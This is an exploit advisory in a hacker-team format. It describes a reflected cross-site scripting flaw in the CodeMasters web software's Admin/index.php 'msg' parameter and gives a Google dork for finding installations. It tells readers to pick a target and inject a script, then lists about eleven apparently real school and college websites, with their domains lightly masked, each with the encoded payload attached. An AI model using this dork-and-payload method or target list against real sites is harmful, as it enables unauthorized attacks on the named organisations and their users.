|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|
|--------------------------------------------------------------|
|[+] Exploit Title: CodeMasters Cross Site Scripting
|[+]
|[+] Exploit Author: Ashiyane Digital Security Team
|[+]
|[+] Vendor Homepage: http://www.codemasters-project.net/
|[+]
|[+] Google Dork: intext:"POWERED BY- CODE MASTERS"
|[+]
|[+] Tested on: Windows,Linux |
|[+]
|[+] Date: 18 Dec. 2015
|[+]
|--------------------------------------------------------------|
|[+] Exploit:
|[+] Search dork and choose a target and add "/Admin/index.php?msg=<script>alert('HACKED');</script>" after URL!
|[+] To see Vulnerability!
|--------------------------------------------------------------|
|[+] Examples :
|[+]
|[+] http://carolstanXdardconventichi.com/Admin/index.php?msg=%3Cscript%3Ealert%28%27asd%27%29;%3C/script%3E
|[+]
|[+] http://spibXssonline.com/Admin/index.php?msg=%3Cscript%3Ealert%28%27asd%27%29;%3C/script%3E
|[+]
|[+] http://mcXmssonline.com/Admin/index.php?msg=%3Cscript%3Ealert%28%27asd%27%29;%3C/script%3E
|[+]
|[+] http://stXmaryscatholiccollegekwamba.com/Admin/index.php?msg=%3Cscript%3Ealert%28%27asd%27%29;%3C/script%3E
|[+]
|[+] http://bXscorlu.com/Admin/index.php?msg=%3Cscript%3Ealert%28%27asd%27%29;%3C/script%3E
|[+]
|[+] http://bumsemXpalace.com/Admin/index.php?msg=%3Cscript%3Ealert%28%27asd%27%29;%3C/script%3E
|[+]
|[+] http://ssanthXony-judescollege.com/Admin/index.php?msg=%3Cscript%3Ealert%28%27asd%27%29;%3C/script%3E
|[+]
|[+] http://carolXstandardconventichi.com/Admin/index.php?msg=%3Cscript%3Ealert%28%27asd%27%29;%3C/script%3E
|[+]
|[+] http://penXielintlseminary.com/Admin/index.php?msg=%3Cscript%3Ealert%28%27asd%27%29;%3C/script%3E
|[+]
|[+] http://stXmartingirlsonline.com/Admin/index.php?msg=%3Cscript%3Ealert%28%27asd%27%29;%3C/script%3E
|[+]
|[+] http://rXesonancemodelschool.com/Admin/index.php?msg=%3Cscript%3Ealert%28%27HACKED%27%29;%3C/script%3E
|[+]
|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|
|[+] Discovered By : Cloner-47
|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|